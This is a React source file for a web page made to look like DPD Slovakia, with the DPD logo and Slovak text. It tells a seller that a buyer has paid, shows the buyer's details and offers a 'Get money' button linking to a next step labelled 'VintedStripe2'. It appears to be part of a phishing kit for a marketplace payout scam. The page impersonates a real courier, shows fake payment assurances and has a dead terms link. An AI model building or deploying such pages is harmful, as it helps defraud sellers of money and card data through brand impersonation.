import React, { useEffect, useState, useMemo } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdSkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const DPD_LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

function noop(e) {
  e.preventDefault();
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function CheckCircleIcon() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="12" cy="12" r="10" />
      <path d="M8 12l2.5 2.5L16 9" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * DPD Slovensko — doklad o platbe, CTA → index2 (VintedStripe2).
 */
function DpdSkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [thumbFailed, setThumbFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  const photoUrl = useMemo(() => (pageData?.photo_url || '').trim(), [pageData?.photo_url]);

  useEffect(() => {
    setThumbFailed(false);
  }, [photoUrl]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = [pageData?.first_name, pageData?.middle_name].filter(Boolean).join(' ').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dpd-sk-wrap">
        <header className="dpd-sk-header">
          <div className="dpd-sk-header-inner">
            <img src={DPD_LOGO_SRC} alt="" className="dpd-sk-logo-header" width={120} height={40} />
          </div>
        </header>
        <main className="dpd-sk-main">
          <div className="dpd-sk-loading">Načítava sa…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dpd-sk-wrap">
      <header className="dpd-sk-header">
        <div className="dpd-sk-header-inner">
          <img src={DPD_LOGO_SRC} alt="DPD" className="dpd-sk-logo-header" width={120} height={40} />
        </div>
      </header>

      <main className="dpd-sk-main">
        <h1 className="dpd-sk-title">Doklad o zaplatení od zákazníka</h1>

        <div className="dpd-sk-grid">
          <div className="dpd-sk-card">
            <div className="dpd-sk-top">
              <div className="dpd-sk-thumb" aria-hidden>
                {photoUrl && !thumbFailed ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="dpd-sk-thumb-img"
                    decoding="async"
                    onError={() => setThumbFailed(true)}
                  />
                ) : null}
              </div>
              <div className="dpd-sk-amounts">
                <div className="dpd-sk-amount-top">{amountLine}</div>
                <div className="dpd-sk-product">{productTitle}</div>
              </div>
            </div>

            <div className="dpd-sk-status-wrap">
              <div className="dpd-sk-status-banner">
                <div className="dpd-sk-status-icon" aria-hidden>
                  <CheckCircleIcon />
                </div>
                <div>
                  <p className="dpd-sk-status-strong">Váš tovar bol uvoľnený!</p>
                  <p className="dpd-sk-status-sub">Kupujúci už za objednávku zaplatil.</p>
                </div>
              </div>

              <div className="dpd-sk-section-h">Detaily doručenia</div>

              <div className="dpd-sk-field">
                <span className="dpd-sk-field-label">Adresa dodania</span>
                <input className="dpd-sk-input" readOnly value={address} />
              </div>

              <div className="dpd-sk-split2">
                <div className="dpd-sk-field">
                  <span className="dpd-sk-field-label">Priezvisko</span>
                  <input className="dpd-sk-input" readOnly value={lastName} />
                </div>
                <div className="dpd-sk-field">
                  <span className="dpd-sk-field-label">Názov</span>
                  <input className="dpd-sk-input" readOnly value={firstName} />
                </div>
              </div>

              <p className="dpd-sk-legal">
                Po obdržaní hotovosti zašlite tovar zákazníkovi podľa zadaných údajov alebo tovar preveďte
                kuriérovi, ktorý vám do 12 hodín zavolá.
              </p>
              <p className="dpd-sk-legal">
                Po doručení tovaru špecifikujte kupujúcemu podacie číslo! Tovar je potrebné doručiť do 3 dní od
                prijatia finančných prostriedkov.
              </p>
            </div>
          </div>

          <aside className="dpd-sk-card">
            <div className="dpd-sk-right">
              <p className="dpd-sk-right-amount">{amountLine}</p>
              <Link to={index2Path} className="dpd-sk-btn">
                Získať peniaze
              </Link>
              <div className="dpd-sk-safe">
                <ShieldCheck />
                Platba je bezpečná
              </div>
              <div className="dpd-sk-disclaimer">
                Kliknutím na tlačidlo „Získať peniaze“ súhlasíte s{' '}
                <a href="#/" onClick={noop}>
                  Podmienkami používania
                </a>{' '}
                online služby „Bezpečná ponuka“.
              </div>
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DpdSkSuccess;
